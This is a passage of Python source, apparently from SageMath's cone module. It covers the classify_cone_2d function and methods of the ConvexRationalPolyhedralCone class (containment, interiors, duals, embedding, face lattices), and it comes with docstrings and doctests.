Sublattice <N(1)>
sage: K2 = Cone([(1,0)])
sage: K2.span()
Sublattice <N(1, 0)>
The span of the nonnegative orthant is the entire ambient lattice::
sage: K = cones.nonnegative_orthant(3)
sage: K.span() == K.lattice()
True
By specifying a ``base_ring``, we can obtain a vector space::
sage: K = Cone([(1,0,0),(0,1,0),(0,0,1)])
sage: K.span(base_ring=QQ)
Vector space of degree 3 and dimension 3 over Rational Field
Basis matrix:
[1 0 0]
[0 1 0]
[0 0 1]
TESTS:
We can take the span of the trivial cone::
sage: cones.trivial(0).span()
Sublattice <>
The span of a solid cone is the entire ambient space::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6, max_rays=8, solid=True)
sage: K.span().vector_space() == K.lattice().vector_space()
True
"""
L = self.lattice()
if base_ring is None:
base_ring = L.base_ring()
return L.span(self, base_ring)
def classify_cone_2d(ray0, ray1, check=True):
r"""
Return `(d,k)` classifying the lattice cone spanned by the two rays.
INPUT:
- ``ray0``, ``ray1`` -- two primitive integer vectors. The
generators of the two rays generating the two-dimensional cone.
- ``check`` -- boolean (default: ``True``). Whether to check the
input rays for consistency.
OUTPUT:
A pair `(d,k)` of integers classifying the cone up to `GL(2, \ZZ)`
equivalence. See Proposition 10.1.1 of [CLS2011]_ for the
definition. We return the unique `(d,k)` with minimal `k`, see
Proposition 10.1.3 of [CLS2011]_.
EXAMPLES::
sage: ray0 = vector([1,0])
sage: ray1 = vector([2,3])
sage: from sage.geometry.cone import classify_cone_2d
sage: classify_cone_2d(ray0, ray1)
(3, 2)
sage: ray0 = vector([2,4,5])
sage: ray1 = vector([5,19,11])
sage: classify_cone_2d(ray0, ray1)
(3, 1)
sage: m = matrix(ZZ, [(19, -14, -115), (-2, 5, 25), (43, -42, -298)])
sage: m.det() # check that it is in GL(3,ZZ)
-1
sage: classify_cone_2d(m*ray0, m*ray1)
(3, 1)
TESTS:
Check using the connection between the Hilbert basis of the cone
spanned by the two rays (in arbitrary dimension) and the
Hirzebruch-Jung continued fraction expansion, see Chapter 10 of
[CLS2011]_ ::
sage: from sage.geometry.cone import normalize_rays
sage: for i in range(10):
....: ray0 = random_vector(ZZ, 3)
....: ray1 = random_vector(ZZ, 3)
....: if ray0.is_zero() or ray1.is_zero(): continue
....: ray0, ray1 = normalize_rays([ray0, ray1], ZZ^3)
....: d, k = classify_cone_2d(ray0, ray1, check=True)
....: assert (d,k) == classify_cone_2d(ray1, ray0)
....: if d == 0: continue
....: frac = (k/d).continued_fraction_list("hj")
....: if len(frac)>100: continue # avoid expensive computation
....: hilb = Cone([ray0, ray1]).Hilbert_basis()
....: assert len(hilb) == len(frac) + 1
"""
if check:
assert ray0.parent() is ray1.parent()
assert ray0.base_ring() is ZZ
assert gcd(ray0) == 1
assert gcd(ray1) == 1
assert not ray0.is_zero() and not ray1.is_zero()
m = matrix([ray0, ray1]) # dim(ray) x 2 matrix
basis = m.saturation().solve_left(m) # 2-d basis for the span of the cone
basis = basis.change_ring(ZZ).transpose()
if basis.nrows() < 2:
d = 0
k = basis[0,1]
else:
basis.echelonize() # columns are the "cone normal form"
d = basis[1,1]
k = basis[0,1]
if check:
if d == 0: # degenerate cone
assert basis[0,0] == 1
assert k == -1 or k == +1
else: # non-degenerate cone
assert basis[0,0] == 1 and basis[1,0] == 0
assert d > 0
assert 0 <= k < d
assert gcd(d,k) == 1
# compute unique k, see Proposition 10.1.3 of [CLS2011]
if d > 0:
for ktilde in range(k):
if (k*ktilde) % d == 1:
k = ktilde
break
return (d,k)
# Derived classes MUST allow construction of their objects using ``ambient``
# and ``ambient_ray_indices`` keyword parameters. See ``intersection`` method
# for an example why this is needed.
@richcmp_method
class ConvexRationalPolyhedralCone(IntegralRayCollection, Container, ConvexSet_closed, sage.geometry.abc.ConvexRationalPolyhedralCone):
r"""
Create a convex rational polyhedral cone.
.. WARNING::
This class does not perform any checks of correctness of input nor
does it convert input into the standard representation. Use
:func:`Cone` to construct cones.
Cones are immutable, but they cache most of the returned values.
INPUT:
The input can be either:
- ``rays`` -- list of immutable primitive vectors in ``lattice``;
- ``lattice`` -- :class:`ToricLattice
<sage.geometry.toric_lattice.ToricLatticeFactory>`, `\ZZ^n`, or any
other object that behaves like these. If ``None``, it will be determined
as :func:`parent` of the first ray. Of course, this cannot be done if
there are no rays, so in this case you must give an appropriate
``lattice`` directly.
or (these parameters must be given as keywords):
- ``ambient`` -- ambient structure of this cone, a bigger :class:`cone
<ConvexRationalPolyhedralCone>` or a :class:`fan
<sage.geometry.fan.RationalPolyhedralFan>`, this cone *must be a face
of* ``ambient``;
- ``ambient_ray_indices`` -- increasing list or tuple of integers, indices
of rays of ``ambient`` generating this cone.
In both cases, the following keyword parameter may be specified in addition:
- ``PPL`` -- either ``None`` (default) or a
:class:`~ppl.polyhedron.C_Polyhedron` representing the cone. This
serves only to cache the polyhedral data if you know it
already. The constructor does not make a copy so the ``PPL`` object
should not be modified afterwards.
OUTPUT:
- convex rational polyhedral cone.
.. NOTE::
Every cone has its ambient structure. If it was not specified, it is
this cone itself.
"""
def __init__(self, rays=None, lattice=None,
ambient=None, ambient_ray_indices=None, PPL=None):
r"""
See :class:`ConvexRationalPolyhedralCone` for documentation.
TESTS::
sage: from sage.geometry.cone import (
....: ConvexRationalPolyhedralCone)
sage: v1 = vector([1,0])
sage: v2 = vector([0,1])
sage: v1.set_immutable()
sage: v2.set_immutable()
sage: ac = ConvexRationalPolyhedralCone([v1, v2], ZZ^2)
sage: ac = ConvexRationalPolyhedralCone([v1, v2], None)
sage: ac.lattice() # Determined automatically
Ambient free module of rank 2
over the principal ideal domain Integer Ring
sage: ac.rays()
(1, 0),
(0, 1)
in Ambient free module of rank 2
over the principal ideal domain Integer Ring
sage: ac.ambient() is ac
True
sage: TestSuite(ac).run()
sage: sc = ConvexRationalPolyhedralCone(ambient=ac,
....: ambient_ray_indices=[1])
sage: sc.rays()
(0, 1)
in Ambient free module of rank 2
over the principal ideal domain Integer Ring
sage: sc.ambient() is ac
True
sage: TestSuite(sc).run()
"""
superinit = super(ConvexRationalPolyhedralCone, self).__init__
if ambient is None:
superinit(rays, lattice)
self._ambient = self
self._ambient_ray_indices = tuple(range(self.nrays()))
else:
self._ambient = ambient
self._ambient_ray_indices = tuple(ambient_ray_indices)
superinit(ambient.rays(self._ambient_ray_indices),
ambient.lattice())
if not PPL is None:
self._PPL_C_Polyhedron = PPL
def _sage_input_(self, sib, coerced):
"""
Return Sage command to reconstruct ``self``.
See :mod:`sage.misc.sage_input` for details.
EXAMPLES::
sage: cone = Cone([(1,0), (1,1)])
sage: sage_input(cone)
Cone([(1, 0), (1, 1)])
"""
return sib.name('Cone')([sib(tuple(r)) for r in self.rays()])
def _PPL_cone(self):
r"""
Returns the Parma Polyhedra Library (PPL) representation of the cone.
OUTPUT:
A :class:`~ppl.polyhedron.C_Polyhedron` representing the cone.
EXAMPLES::
sage: c = Cone([(1,0), (1,1), (0,1)])
sage: c._PPL_cone()
A 2-dimensional polyhedron in QQ^2 defined as
the convex hull of 1 point, 2 rays
sage: c._PPL_cone().minimized_generators()
Generator_System {point(0/1, 0/1), ray(0, 1), ray(1, 0)}
sage: c._PPL_cone().minimized_constraints()
Constraint_System {x1>=0, x0>=0}
TESTS:
There are no empty cones, the origin always belongs to them::
sage: Cone([(0,0)])._PPL_cone()
A 0-dimensional polyhedron in QQ^2
defined as the convex hull of 1 point
sage: cones.trivial(2)._PPL_cone()
A 0-dimensional polyhedron in QQ^2
defined as the convex hull of 1 point
"""
if "_PPL_C_Polyhedron" not in self.__dict__:
gs = Generator_System(
PPL_point(Linear_Expression(self._lattice(0), 0)))
for r in self.rays():
gs.insert( PPL_ray(Linear_Expression(r,0)) )
self._PPL_C_Polyhedron = C_Polyhedron(gs)
return self._PPL_C_Polyhedron
def __contains__(self, point):
r"""
Check if ``point`` is contained in ``self``.
See :meth:`_contains` (which is called by this function) for
documentation.
TESTS::
sage: c = Cone([(1,0), (0,1)])
sage: (1,1) in c
True
sage: [1,1] in c
True
sage: (-1,0) in c
False
"""
return self._contains(point)
def __getstate__(self):
r"""
Return the dictionary that should be pickled.
OUTPUT:
- :class:`dict`.
TESTS::
sage: C = Cone([(1,0)])
sage: C.face_lattice()
Finite lattice containing 2 elements with distinguished linear extension
sage: C._test_pickling()
sage: C2 = loads(dumps(C)); C2
1-d cone in 2-d lattice N
sage: C2 == C
True
sage: C2 is C # Is this desirable?
False
"""
state = copy(self.__dict__)
state.pop("_PPL_C_Polyhedron", None) # PPL is not picklable.
# TODO: do we want to keep the face lattice in the pickle?
# Currently there is an unpickling loop if do:
# Unpickling a cone C requires first to unpickle its face lattice.
# The latter is a Poset which takes C among its arguments. Due
# to UniqueRepresentation, this triggers a call to hash(C) which
# itself depends on the attribute C._rays which have not yet
# been unpickled. See ``explain_pickle(dumps(C))``.
state.pop("_face_lattice", None)
return state
def _contains(self, point, region='whole cone'):
r"""
Check if ``point`` is contained in ``self``.
This function is called by :meth:`__contains__` and :meth:`contains`
to ensure the same call depth for warning messages.
By default, a point on the boundary of the cone is considered
part of the cone. If you want to test whether the
**interior** of the cone contains the point, you need to pass
the optional argument ``'interior'``. If you want to test
whether the **relative interior** of the cone contains the
point, you need to pass the optional argument
``'relative_interior'``.
.. WARNING::
The boundary of a closed convex cone is determined by a
set of inequalities. If your ``point`` has entries in an
inexact ring, it will sometimes be impossible to say (with
confidence) if that point lies on the boundary of the cone
or slightly inside it.
INPUT:
- ``point`` -- anything; an attempt will be made to convert it
into an element compatible with the ambient space of ``self``.
- ``region`` -- a string (default: 'whole cone'); can be
either 'whole cone', 'interior', or 'relative interior'.
OUTPUT:
``True`` is returned if ``point`` is contained in the
specified ``region`` of ``self``. ``False`` is returned
otherwise, in particular when ``point`` is incompatible with
the ambient space.
A ``ValueError`` is raised if ``region`` is not one of the
three allowed values.
TESTS::
sage: c = Cone([(1,0), (0,1)])
sage: c._contains((1,1))
True
We can test vectors with irrational components::
sage: c = Cone([(1,0), (0,1)])
sage: c._contains((1,sqrt(2)))
True
sage: c._contains(vector(SR, [1,pi]))
True
Ensure that complex vectors are not contained in a real cone::
sage: c = Cone([(1,0), (0,1)])
sage: c._contains((1,I))
False
sage: c._contains(vector(QQbar,[1,I]))
False
And we refuse to coerce elements of another lattice into ours::
sage: c = Cone([(1,0), (0,1)])
sage: c._contains(c.dual().ray(0))
False
"""
try:
point = _ambient_space_point(self, point)
except TypeError as ex:
if str(ex).endswith("have incompatible lattices!"):
warn("you have checked if a cone contains a point "
"from an incompatible lattice, this is False!",
stacklevel=3)
return False
if region not in ("whole cone", "relative interior", "interior"):
raise ValueError("%s is an unknown region of the cone!" % region)
if region == "interior" and self.dim() < self.lattice_dim():
return False
need_strict = region.endswith("interior")
M = self.dual_lattice()
for c in self._PPL_cone().minimized_constraints():
pr = M(c.coefficients()) * point
if c.is_equality():
if pr != 0:
return False
elif pr < 0 or need_strict and pr == 0:
return False
return True
def interior_contains(self, *args):
r"""
Check if a given point is contained in the interior of ``self``.
For a cone of strictly lower-dimension than the ambient space,
the interior is always empty. You probably want to use
:meth:`relative_interior_contains` in this case.
INPUT:
- anything. An attempt will be made to convert all arguments into a
single element of the ambient space of ``self``. If it fails,
``False`` will be returned.
OUTPUT:
- ``True`` if the given point is contained in the interior of
``self``, ``False`` otherwise.
EXAMPLES::
sage: c = Cone([(1,0), (0,1)])
sage: c.contains((1,1))
True
sage: c.interior_contains((1,1))
True
sage: c.contains((1,0))
True
sage: c.interior_contains((1,0))
False
"""
point = flatten(args)
if len(point) == 1:
point = point[0]
return self._contains(point, 'interior')
@cached_method
def interior(self):
r"""
Return the interior of ``self``.
OUTPUT:
- either ``self``, an empty polyhedron, or an instance of
:class:`~sage.geometry.relative_interior.RelativeInterior`.
EXAMPLES::
sage: c = Cone([(1,0,0), (0,1,0)]); c
2-d cone in 3-d lattice N
sage: c.interior()
The empty polyhedron in ZZ^3
sage: origin = cones.trivial(2); origin
0-d cone in 2-d lattice N
sage: origin.interior()
The empty polyhedron in ZZ^2
sage: K = cones.nonnegative_orthant(2); K
2-d cone in 2-d lattice N
sage: K.interior()
Relative interior of 2-d cone in 2-d lattice N
sage: K2 = Cone([(1,0),(-1,0),(0,1),(0,-1)]); K2
2-d cone in 2-d lattice N
sage: K2.interior() is K2
True
"""
if self.is_solid():
return self.relative_interior()
return Polyhedron(ambient_dim=self.lattice_dim())
def relative_interior_contains(self, *args):
r"""
Check if a given point is contained in the relative interior of ``self``.
For a full-dimensional cone the relative interior is simply
the interior, so this method will do the same check as
:meth:`interior_contains`. For a strictly lower-dimensional cone, the
relative interior is the cone without its facets.
INPUT:
- anything. An attempt will be made to convert all arguments into a
single element of the ambient space of ``self``. If it fails,
``False`` will be returned.
OUTPUT:
- ``True`` if the given point is contained in the relative
interior of ``self``, ``False`` otherwise.
EXAMPLES::
sage: c = Cone([(1,0,0), (0,1,0)])
sage: c.contains((1,1,0))
True
sage: c.relative_interior_contains((1,1,0))
True
sage: c.interior_contains((1,1,0))
False
sage: c.contains((1,0,0))
True
sage: c.relative_interior_contains((1,0,0))
False
sage: c.interior_contains((1,0,0))
False
"""
point = flatten(args)
if len(point) == 1:
point = point[0]
return self._contains(point, 'relative interior')
@cached_method
def relative_interior(self):
r"""
Return the relative interior of ``self``.
OUTPUT:
- either ``self`` or an instance of
:class:`~sage.geometry.relative_interior.RelativeInterior`.
EXAMPLES::
sage: c = Cone([(1,0,0), (0,1,0)]); c
2-d cone in 3-d lattice N
sage: c.relative_interior()
Relative interior of 2-d cone in 3-d lattice N
sage: origin = cones.trivial(2); origin
0-d cone in 2-d lattice N
sage: origin.relative_interior() is origin
True
sage: K1 = Cone([(1,0), (-1,0)]); K1
1-d cone in 2-d lattice N
sage: K1.relative_interior() is K1
True
sage: K2 = Cone([(1,0),(-1,0),(0,1),(0,-1)]); K2
2-d cone in 2-d lattice N
sage: K2.relative_interior() is K2
True
"""
if self.is_relatively_open():
return self
return RelativeInterior(self)
def cartesian_product(self, other, lattice=None):
r"""
Return the Cartesian product of ``self`` with ``other``.
INPUT:
- ``other`` -- a :class:`cone <ConvexRationalPolyhedralCone>`;
- ``lattice`` -- (optional) the ambient lattice for the
Cartesian product cone. By default, the direct sum of the
ambient lattices of ``self`` and ``other`` is constructed.
OUTPUT:
- a :class:`cone <ConvexRationalPolyhedralCone>`.
EXAMPLES::
sage: c = Cone([(1,)])
sage: c.cartesian_product(c)
2-d cone in 2-d lattice N+N
sage: _.rays()
N+N(1, 0),
N+N(0, 1)
in 2-d lattice N+N
"""
assert is_Cone(other)
rc = super(ConvexRationalPolyhedralCone, self).cartesian_product(
other, lattice)
return ConvexRationalPolyhedralCone(rc.rays(), rc.lattice())
def __neg__(self):
"""
Return the cone with opposite rays.
OUTPUT:
- a :class:`cone <ConvexRationalPolyhedralCone>`.
EXAMPLES::
sage: c = Cone([(1,1),(0,1)]); c
2-d cone in 2-d lattice N
sage: d = -c; d # indirect doctest
2-d cone in 2-d lattice N
sage: -d == c
True
sage: d.rays()
N(-1, -1),
N( 0, -1)
in 2-d lattice N
"""
rc = super(ConvexRationalPolyhedralCone, self).__neg__()
return ConvexRationalPolyhedralCone(rc.rays(), rc.lattice())
def __richcmp__(self, right, op):
r"""
Compare ``self`` and ``right``.
INPUT:
- ``right`` -- anything.
OUTPUT:
boolean
There is equality if ``self`` and ``right`` are cones of any
kind in the same lattice with the same rays listed in the
same order.
TESTS::
sage: c1 = Cone([(1,0), (0,1)])
sage: c2 = Cone([(0,1), (1,0)])
sage: c3 = Cone([(0,1), (1,0)])
sage: c1 > c2
True
sage: c2 < c1
True
sage: c2 == c3
True
sage: c2 is c3
False
"""
if is_Cone(right):
# We don't care about particular type of right in this case
return richcmp((self.lattice(), self.rays()),
(right.lattice(), right.rays()), op)
else:
return NotImplemented
def _latex_(self):
r"""
Return a LaTeX representation of ``self``.
OUTPUT:
- string.
TESTS::
sage: quadrant = Cone([(1,0), (0,1)])
sage: quadrant._latex_()
'\\sigma^{2}'
sage: quadrant.facets()[0]._latex_()
'\\sigma^{1} \\subset \\sigma^{2}'
"""
if self.ambient() is self:
return r"\sigma^{%d}" % self.dim()
else:
return r"\sigma^{%d} \subset %s" % (self.dim(),
latex(self.ambient()))
def _repr_(self):
r"""
Return a string representation of ``self``.
OUTPUT:
- string.
TESTS::
sage: quadrant = Cone([(1,0), (0,1)])
sage: quadrant._repr_()
'2-d cone in 2-d lattice N'
sage: quadrant
2-d cone in 2-d lattice N
sage: quadrant.facets()[0]
1-d face of 2-d cone in 2-d lattice N
"""
result = "%d-d" % self.dim()
if self.ambient() is self:
result += " cone in"
if is_ToricLattice(self.lattice()):
result += " %s" % self.lattice()
else:
result += " %d-d lattice" % self.lattice_dim()
else:
result += " face of %s" % self.ambient()
return result
def _some_elements_(self):
r"""
Generate some points of ``self``.
EXAMPLES::
sage: K = cones.nonnegative_orthant(3)
sage: K.some_elements() # indirect doctest
[(0, 0, 0), (1/2, 0, 0), (1/4, 1/2, 0), (1/8, 1/4, 1/2)]
"""
V = self.ambient_vector_space()
r_iter = iter(self._rays)
p = V(0)
yield p
for i in range(5):
try:
p = (p + next(r_iter)) / 2
except StopIteration:
return
yield p
def _sort_faces(self, faces):
r"""
Return sorted (if necessary) ``faces`` as a tuple.
This function ensures that one-dimensional faces are listed in
agreement with the order of corresponding rays and facets with
facet normals.
INPUT:
- ``faces`` -- iterable of :class:`cones
<ConvexRationalPolyhedralCone>`.
OUTPUT:
- :class:`tuple` of :class:`cones <ConvexRationalPolyhedralCone>`.
TESTS::
sage: octant = Cone(identity_matrix(3).columns())
sage: # indirect doctest
sage: for i, face in enumerate(octant.faces(1)):
....: if face.ray(0) != octant.ray(i):
....: print("Wrong order!")
"""
faces = tuple(faces)
if len(faces) > 1: # Otherwise there is nothing to sort
if faces[0].nrays() == 1:
faces = tuple(sorted(faces,
key=lambda f: f._ambient_ray_indices))
elif faces[0].dim() == self.dim() - 1 and \
self.facet_normals.is_in_cache():
# If we already have facet normals, sort according to them
faces = set(faces)
sorted_faces = [None] * len(faces)
for i, n in enumerate(self.facet_normals()):
for f in faces:
if n*f.rays() == 0:
sorted_faces[i] = f
faces.remove(f)
break
faces = tuple(sorted_faces)
return faces
@cached_method
def adjacent(self):
r"""
Return faces adjacent to ``self`` in the ambient face lattice.
Two *distinct* faces `F_1` and `F_2` of the same face lattice are
**adjacent** if all of the following conditions hold:
* `F_1` and `F_2` have the same dimension `d`;
* `F_1` and `F_2` share a facet of dimension `d-1`;
* `F_1` and `F_2` are facets of some face of dimension `d+1`, unless
`d` is the dimension of the ambient structure.
OUTPUT:
- :class:`tuple` of :class:`cones <ConvexRationalPolyhedralCone>`.
EXAMPLES::
sage: octant = Cone([(1,0,0), (0,1,0), (0,0,1)])
sage: octant.adjacent()
()
sage: one_face = octant.faces(1)[0]
sage: len(one_face.adjacent())
2
sage: one_face.adjacent()[1]
1-d face of 3-d cone in 3-d lattice N
Things are a little bit subtle with fans, as we illustrate below.
First, we create a fan from two cones in the plane::
sage: fan = Fan(cones=[(0,1), (1,2)],
....: rays=[(1,0), (0,1), (-1,0)])
sage: cone = fan.generating_cone(0)
sage: len(cone.adjacent())
1
The second generating cone is adjacent to this one. Now we create the
same fan, but embedded into the 3-dimensional space::
sage: fan = Fan(cones=[(0,1), (1,2)],
....: rays=[(1,0,0), (0,1,0), (-1,0,0)])
sage: cone = fan.generating_cone(0)
sage: len(cone.adjacent())
1
The result is as before, since we still have::
sage: fan.dim()
2
Now we add another cone to make the fan 3-dimensional::
sage: fan = Fan(cones=[(0,1), (1,2), (3,)],
....: rays=[(1,0,0), (0,1,0), (-1,0,0), (0,0,1)])
sage: cone = fan.generating_cone(0)
sage: len(cone.adjacent())
0
Since now ``cone`` has smaller dimension than ``fan``, it and its
adjacent cones must be facets of a bigger one, but since ``cone``
in this example is generating, it is not contained in any other.
"""
L = self._ambient._face_lattice_function()
adjacent = set()
facets = self.facets()
superfaces = self.facet_of()
if superfaces:
for superface in superfaces:
for facet in facets:
adjacent.update(L.open_interval(facet, superface))
if adjacent:
adjacent.remove(L(self))
return self._sort_faces(adjacent)
elif self.dim() == self._ambient.dim():
# Special treatment relevant for fans
for facet in facets:
adjacent.update(facet.facet_of())
if adjacent:
adjacent.remove(self)
return self._sort_faces(adjacent)
else:
return ()
def ambient(self):
r"""
Return the ambient structure of ``self``.
OUTPUT:
- cone or fan containing ``self`` as a face.
EXAMPLES::
sage: cone = Cone([(1,2,3), (4,6,5), (9,8,7)])
sage: cone.ambient()
3-d cone in 3-d lattice N
sage: cone.ambient() is cone
True
sage: face = cone.faces(1)[0]
sage: face
1-d face of 3-d cone in 3-d lattice N
sage: face.ambient()
3-d cone in 3-d lattice N
sage: face.ambient() is cone
True
"""
return self._ambient
def ambient_ray_indices(self):
r"""
Return indices of rays of the ambient structure generating ``self``.
OUTPUT:
- increasing :class:`tuple` of integers.
EXAMPLES::
sage: quadrant = Cone([(1,0), (0,1)])
sage: quadrant.ambient_ray_indices()
(0, 1)
sage: quadrant.facets()[1].ambient_ray_indices()
(1,)
"""
return self._ambient_ray_indices
def contains(self, *args):
r"""
Check if a given point is contained in ``self``.
INPUT:
- anything. An attempt will be made to convert all arguments into a
single element of the ambient space of ``self``. If it fails,
``False`` will be returned.
OUTPUT:
- ``True`` if the given point is contained in ``self``, ``False``
otherwise.
EXAMPLES::
sage: c = Cone([(1,0), (0,1)])
sage: c.contains(c.lattice()(1,0))
True
sage: c.contains((1,0))
True
sage: c.contains((1,1))
True
sage: c.contains(1,1)
True
sage: c.contains((-1,0))
False
sage: c.contains(c.dual_lattice()(1,0)) #random output (warning)
False
sage: c.contains(c.dual_lattice()(1,0))
False
sage: c.contains(1)
False
sage: c.contains(1/2, sqrt(3))
True
sage: c.contains(-1/2, sqrt(3))
False
"""
point = flatten(args)
if len(point) == 1:
point = point[0]
return self._contains(point)
def dual(self):
r"""
Return the dual cone of ``self``.
OUTPUT:
- :class:`cone <ConvexRationalPolyhedralCone>`.
EXAMPLES::
sage: cone = Cone([(1,0), (-1,3)])
sage: cone.dual().rays()
M(0, 1),
M(3, 1)
in 2-d lattice M
Now let's look at a more complicated case::
sage: cone = Cone([(-2,-1,2), (4,1,0), (-4,-1,-5), (4,1,5)])
sage: cone.is_strictly_convex()
False
sage: cone.dim()
3
sage: cone.dual().rays()
M(7, -18, -2),
M(1, -4, 0)
in 3-d lattice M
sage: cone.dual().dual() is cone
True
We correctly handle the degenerate cases::
sage: N = ToricLattice(2)
sage: Cone([], lattice=N).dual().rays() # empty cone
M( 1, 0),
M(-1, 0),
M( 0, 1),
M( 0, -1)
in 2-d lattice M
sage: Cone([(1,0)], lattice=N).dual().rays() # ray in 2d
M(1, 0),
M(0, 1),
M(0, -1)
in 2-d lattice M
sage: Cone([(1,0),(-1,0)], lattice=N).dual().rays() # line in 2d
M(0, 1),
M(0, -1)
in 2-d lattice M
sage: Cone([(1,0),(0,1)], lattice=N).dual().rays() # strictly convex cone
M(0, 1),
M(1, 0)
in 2-d lattice M
sage: Cone([(1,0),(-1,0),(0,1)], lattice=N).dual().rays() # half space
M(0, 1)
in 2-d lattice M
sage: Cone([(1,0),(0,1),(-1,-1)], lattice=N).dual().rays() # whole space
Empty collection
in 2-d lattice M
TESTS:
The dual cone of a (random) dual cone is the original cone::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8, max_rays=10)
sage: K.dual().dual() is K
True
"""
if "_dual" not in self.__dict__:
rays = list(self.facet_normals())
for ray in self.orthogonal_sublattice().gens():
rays.append(ray)
rays.append(-ray)
self._dual = Cone(rays, lattice=self.dual_lattice(), check=False)
self._dual._dual = self
return self._dual
def embed(self, cone):
r"""
Return the cone equivalent to the given one, but sitting in ``self`` as
a face.
You may need to use this method before calling methods of ``cone`` that
depend on the ambient structure, such as
:meth:`~sage.geometry.cone.ConvexRationalPolyhedralCone.ambient_ray_indices`
or
:meth:`~sage.geometry.cone.ConvexRationalPolyhedralCone.facet_of`. The
cone returned by this method will have ``self`` as ambient. If ``cone``
does not represent a valid cone of ``self``, ``ValueError`` exception
is raised.
.. NOTE::
This method is very quick if ``self`` is already the ambient
structure of ``cone``, so you can use without extra checks and
performance hit even if ``cone`` is likely to sit in ``self`` but
in principle may not.
INPUT:
- ``cone`` -- a :class:`cone
<sage.geometry.cone.ConvexRationalPolyhedralCone>`.
OUTPUT:
- a :class:`cone <sage.geometry.cone.ConvexRationalPolyhedralCone>`,
equivalent to ``cone`` but sitting inside ``self``.
EXAMPLES:
Let's take a 3-d cone on 4 rays::
sage: c = Cone([(1,0,1), (0,1,1), (-1,0,1), (0,-1,1)])
Then any ray generates a 1-d face of this cone, but if you construct
such a face directly, it will not "sit" inside the cone::
sage: ray = Cone([(0,-1,1)])
sage: ray
1-d cone in 3-d lattice N
sage: ray.ambient_ray_indices()
(0,)
sage: ray.adjacent()
()
sage: ray.ambient()
1-d cone in 3-d lattice N
If we want to operate with this ray as a face of the cone, we need to
embed it first::
sage: e_ray = c.embed(ray)
sage: e_ray
1-d face of 3-d cone in 3-d lattice N
sage: e_ray.rays()
N(0, -1, 1)
in 3-d lattice N
sage: e_ray is ray
False
sage: e_ray.is_equivalent(ray)
True
sage: e_ray.ambient_ray_indices()
(3,)
sage: e_ray.adjacent()
(1-d face of 3-d cone in 3-d lattice N,
1-d face of 3-d cone in 3-d lattice N)
sage: e_ray.ambient()
3-d cone in 3-d lattice N
Not every cone can be embedded into a fixed ambient cone::
sage: c.embed(Cone([(0,0,1)]))
Traceback (most recent call last):
...
ValueError: 1-d cone in 3-d lattice N is not a face
of 3-d cone in 3-d lattice N!
sage: c.embed(Cone([(1,0,1), (-1,0,1)]))
Traceback (most recent call last):
...
ValueError: 2-d cone in 3-d lattice N is not a face
of 3-d cone in 3-d lattice N!
"""
assert is_Cone(cone)
if cone.ambient() is self:
return cone
if self.is_strictly_convex():
rays = self.rays()
try:
ray_indices = tuple(sorted(rays.index(ray)
for ray in cone.rays()))
for face in self.faces(cone.dim()):
if face.ambient_ray_indices() == ray_indices:
return face
except ValueError:
pass
else:
# We cannot use the trick with indices since rays are not unique.
for face in self.faces(cone.dim()):
if cone.is_equivalent(face):
return face
# If we are here, then either ValueError was raised or we went through
# all faces and didn't find the matching one.
raise ValueError("%s is not a face of %s!" % (cone, self))
def face_lattice(self):
r"""
Return the face lattice of ``self``.
This lattice will have the origin as the bottom (we do not include the
empty set as a face) and this cone itself as the top.
OUTPUT:
- :class:`finite poset <sage.combinat.posets.posets.FinitePoset>` of
:class:`cones <ConvexRationalPolyhedralCone>`.
EXAMPLES:
Let's take a look at the face lattice of the first quadrant::
sage: quadrant = Cone([(1,0), (0,1)])
sage: L = quadrant.face_lattice()
sage: L
Finite lattice containing 4 elements with distinguished linear extension
To see all faces arranged by dimension, you can do this::
sage: for level in L.level_sets(): print(level)
[0-d face of 2-d cone in 2-d lattice N]
[1-d face of 2-d cone in 2-d lattice N,
1-d face of 2-d cone in 2-d lattice N]
[2-d cone in 2-d lattice N]
For a particular face you can look at its actual rays... ::
sage: face = L.level_sets()[1][0]
sage: face.rays()
N(1, 0)
in 2-d lattice N
... or you can see the index of the ray of the original cone that
corresponds to the above one::
sage: face.ambient_ray_indices()
(0,)
sage: quadrant.ray(0)
N(1, 0)
An alternative to extracting faces from the face lattice is to use
:meth:`faces` method::
sage: face is quadrant.faces(dim=1)[0]
True
The advantage of working with the face lattice directly is that you
can (relatively easily) get faces that are related to the given one::
sage: face = L.level_sets()[1][0]
sage: D = L.hasse_diagram()
sage: sorted(D.neighbors(face))
[0-d face of 2-d cone in 2-d lattice N,
2-d cone in 2-d lattice N]
However, you can achieve some of this functionality using
:meth:`facets`, :meth:`facet_of`, and :meth:`adjacent` methods::
sage: face = quadrant.faces(1)[0]
sage: face
1-d face of 2-d cone in 2-d lattice N
sage: face.rays()
N(1, 0)
in 2-d lattice N
sage: face.facets()
(0-d face of 2-d cone in 2-d lattice N,)
sage: face.facet_of()
(2-d cone in 2-d lattice N,)
sage: face.adjacent()
(1-d face of 2-d cone in 2-d lattice N,)
sage: face.adjacent()[0].rays()
N(0, 1)
in 2-d lattice N
Note that if ``cone`` is a face of ``supercone``, then the face
lattice of ``cone`` consists of (appropriate) faces of ``supercone``::
sage: supercone = Cone([(1,2,3,4), (5,6,7,8),
....: (1,2,4,8), (1,3,9,7)])
sage: supercone.face_lattice()
Finite lattice containing 16 elements with distinguished linear extension
sage: supercone.face_lattice().top()
4-d cone in 4-d lattice N
sage: cone = supercone.facets()[0]
sage: cone
3-d face of 4-d cone in 4-d lattice N
sage: cone.face_lattice()
Finite poset containing 8 elements with distinguished linear extension
sage: cone.face_lattice().bottom()
0-d face of 4-d cone in 4-d lattice N
sage: cone.face_lattice().top()
3-d face of 4-d cone in 4-d lattice N
sage: cone.face_lattice().top() == cone
True
TESTS::
sage: C1 = Cone([(0,1)])
sage: C2 = Cone([(0,1)])
sage: C1 == C2
True
sage: C1 is C2
False
C1 and C2 are equal, but not identical. We currently want them
to have non identical face lattices, even if the faces
themselves are equal (see :trac:`10998`)::
sage: C1.face_lattice() is C2.face_lattice()
False
sage: C1.facets()[0]
0-d face of 1-d cone in 2-d lattice N
sage: C2.facets()[0]
0-d face of 1-d cone in 2-d lattice N
sage: C1.facets()[0].ambient() is C1
True
sage: C2.facets()[0].ambient() is C1
False
sage: C2.facets()[0].ambient() is C2
True
"""
if "_face_lattice" not in self.__dict__:
if self._ambient is self:
# We need to compute face lattice on our own. To accommodate
# non-strictly convex cones we split rays (or rather their
# indices) into those in the linear subspace and others, which
# we refer to as atoms.
S = self.linear_subspace()
subspace_rays = []
atom_to_ray = []
for i, ray in enumerate(self):
